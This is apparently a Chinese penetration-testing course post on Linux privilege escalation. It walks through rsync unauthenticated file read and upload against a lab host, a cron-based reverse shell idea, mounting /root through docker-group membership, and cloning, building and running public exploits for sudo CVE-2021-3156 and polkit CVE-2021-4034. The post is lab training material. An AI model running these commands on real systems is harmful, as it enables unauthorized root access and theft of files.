第105天:权限提升-Linux 系统Docker 挂载Rsync 未授权Sudo-CVEPolkitCVE

本文主要是介绍第105天:权限提升-Linux 系统Docker 挂载Rsync 未授权Sudo-CVEPolkitCVE,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

思维导图

案例一:  Linux-Rsync 未授权访问覆盖-本地

案例二:  Linux-Docker 组用户挂载目录-本地

案例三:  Linux-Sudo(CVE-2021-3156)-本地

案例四:Linux-Polkit(CVE-2021-4034)-本地


思维导图

 

案例一:  Linux-Rsync 未授权访问覆盖-本地

rsync 文件传输协议-linux  端口873

配置不当会造成未授权访问。没有配置ACL或者访问密码,可以读取目标服务器文件

靶场环境:

访问端口

 判断是否有该漏洞的方法:

rsync rsync://123.58.224.8:58515

利用读取文件

rsync rsync://123.58.224.8:58515/src

下载文件  ./ 为当前目录

rsync rsync://123.58.224.8:58515/src/etc/passwd ./

 上传文件

rsync -av passwd rsync://123.58.224.8:58515/src/tmp/passwd

 利用他去反弹shell的思路:利用计时任务

这里由于该靶场为在线靶场,有时间限制,且必须利用公网ip反弹shell,这里利用下面的网址,搭建在线靶场:Vulhub - Docker-Compose file for vulnerability environment

首先把计时任务保存到本地

查看可利用的文件

 必须加执行权限

 把脚本进行上传

 开启监听等待

刚好反弹shell

案例二:  Linux-Docker 组用户挂载目录-本地

首先条件:普通用户在docker组,利用docker服务启动镜像挂载目录
从而来访问root目录、etc目录等敏感文件来进行权限提升。

​环境搭建

useradd -d /home/test -m test  (创建test用户)
passwd test    (修改密码)
usermod -G docker test  (把test用户加入到docker组当中)

利用命令

docker run -v /root:/mnt -it alpine

docker下载alpine镜像,然后利用-v选项把/root目录挂载到docker里面的/mnt目录,-it进入docker,进去以后他会默认你是root用户,你可以去查看/mnt下里面/root的敏感文件

这里我提权拉取了一次所以没有下载过程

root目录直接挂载到了/mnt目录下获得了敏感信息的窃取

不仅可以调用/root,也可以调用其他目录,因为docker命令需要执行下载,等等操作,在这个过程当中本身就是root权限,所以所有目录都可以

案例三:  Linux-Sudo(CVE-2021-3156)-本地

影响版本

sudo: 1.8.2 - 1.8.31p2
sudo: 1.9.0 - 1.9.5p1

这台机器正好符合

或者利用   sudoedit -s /  去查看如果有报错那证明有漏洞,没报错证明没有

有漏洞的报错

没有漏洞的报错

可能用到的代码

git clone https://github.com/blasty/CVE-2021-3156.git  #下载
cd CVE-2021-3156
make    #编译
chmod a+x sudo-hax-me-a-sandwich #加执行权限
./sudo-hax-me-a-sandwich 1   #后面的数字1是选择模式

 执行效果

案例四:Linux-Polkit(CVE-2021-4034)-本地

漏洞影响2009年5月至今的所有polkit版本
由于polkit是系统预装工具,所有存在polkit的linux系统均受影响
如:CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等

判断

dpkg -l policykit-1

如果是这种信息的话那证明可能可以利用

git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034/
make
./cve-2021-4034

这篇关于第105天:权限提升-Linux 系统Docker 挂载Rsync 未授权Sudo-CVEPolkitCVE的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1061215

相关文章

Linux镜像文件制作方式

《Linux镜像文件制作方式》本文介绍了Linux镜像文件制作的过程,包括确定磁盘空间布局、制作空白镜像文件、分区与格式化、复制引导分区和其他分区... 目录1.确定磁盘空间布局2.制作空白镜像文件3.分区与格式化1) 分区2) 格式化4.复制引导分区5.复制其它分区1) 挂载2) 复制bootfs分区3)

python项目打包成docker容器镜像的两种方法实现

《python项目打包成docker容器镜像的两种方法实现》本文介绍两种将Python项目打包为Docker镜像的方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要... 目录简单版:(一次成功,后续下载对应的软件依赖)第一步:肯定是构建dockerfile,如下:第二步

Python + Streamlit项目部署方案超详细教程(非Docker版)

《Python+Streamlit项目部署方案超详细教程(非Docker版)》Streamlit是一款强大的Python框架,专为机器学习及数据可视化打造,:本文主要介绍Python+St... 目录一、针对 Alibaba Cloud linux/Centos 系统的完整部署方案1. 服务器基础配置(阿里

Linux服务器数据盘移除并重新挂载的全过程

《Linux服务器数据盘移除并重新挂载的全过程》:本文主要介绍在Linux服务器上移除并重新挂载数据盘的整个过程,分为三大步:卸载文件系统、分离磁盘和重新挂载,每一步都有详细的步骤和注意事项,确保... 目录引言第一步:卸载文件系统第二步:分离磁盘第三步:重新挂载引言在 linux 服务器上移除并重新挂p

MySQL 批量插入的原理和实战方法(快速提升大数据导入效率)

《MySQL批量插入的原理和实战方法(快速提升大数据导入效率)》在日常开发中,我们经常需要将大量数据批量插入到MySQL数据库中,本文将介绍批量插入的原理、实现方法,并结合Python和PyMySQ... 目录一、批量插入的优势二、mysql 表的创建示例三、python 实现批量插入1. 安装 PyMyS

Linux下屏幕亮度的调节方式

《Linux下屏幕亮度的调节方式》文章介绍了Linux下屏幕亮度调节的几种方法,包括图形界面、手动调节(使用ACPI内核模块)和外接显示屏调节,以及自动调节软件(CaliseRedshift和Reds... 目录1 概述2 手动调节http://www.chinasem.cn2.1 手动屏幕调节2.2 外接显

Linux(centos7)虚拟机没有IP问题及解决方案

《Linux(centos7)虚拟机没有IP问题及解决方案》文章介绍了在CentOS7中配置虚拟机网络并使用Xshell连接虚拟机的步骤,首先,检查并配置网卡ens33的ONBOOT属性为yes,然后... 目录输入查看ZFhrxIP命令:ip addr查看,没有虚拟机IP修改ens33配置文件重启网络Xh

kingbase修改权限实现方式

《kingbase修改权限实现方式》该文章详细介绍了如何在数据库中创建用户并赋予其相应的权限,包括创建用户、回收默认权限、创建数据库、赋权数据库权限、创建只读用户以及回收权限等步骤... 目录前言使用步骤总结前言创建用户后对数据库对象的读写权限进行修改使用步骤1、创建用户create user cs

C++简单日志系统实现代码示例

《C++简单日志系统实现代码示例》日志系统是成熟软件中的一个重要组成部分,其记录软件的使用和运行行为,方便事后进行故障分析、数据统计等,:本文主要介绍C++简单日志系统实现的相关资料,文中通过代码... 目录前言Util.hppLevel.hppLogMsg.hppFormat.hppSink.hppBuf

linux实现对.jar文件的配置文件进行修改

《linux实现对.jar文件的配置文件进行修改》文章讲述了如何使用Linux系统修改.jar文件的配置文件,包括进入文件夹、编辑文件、保存并退出编辑器,以及重新启动项目... 目录linux对.jar文件的配置文件进行修改第一步第二步 第三步第四步总结linux对.jar文件的配置文件进行修改第一步进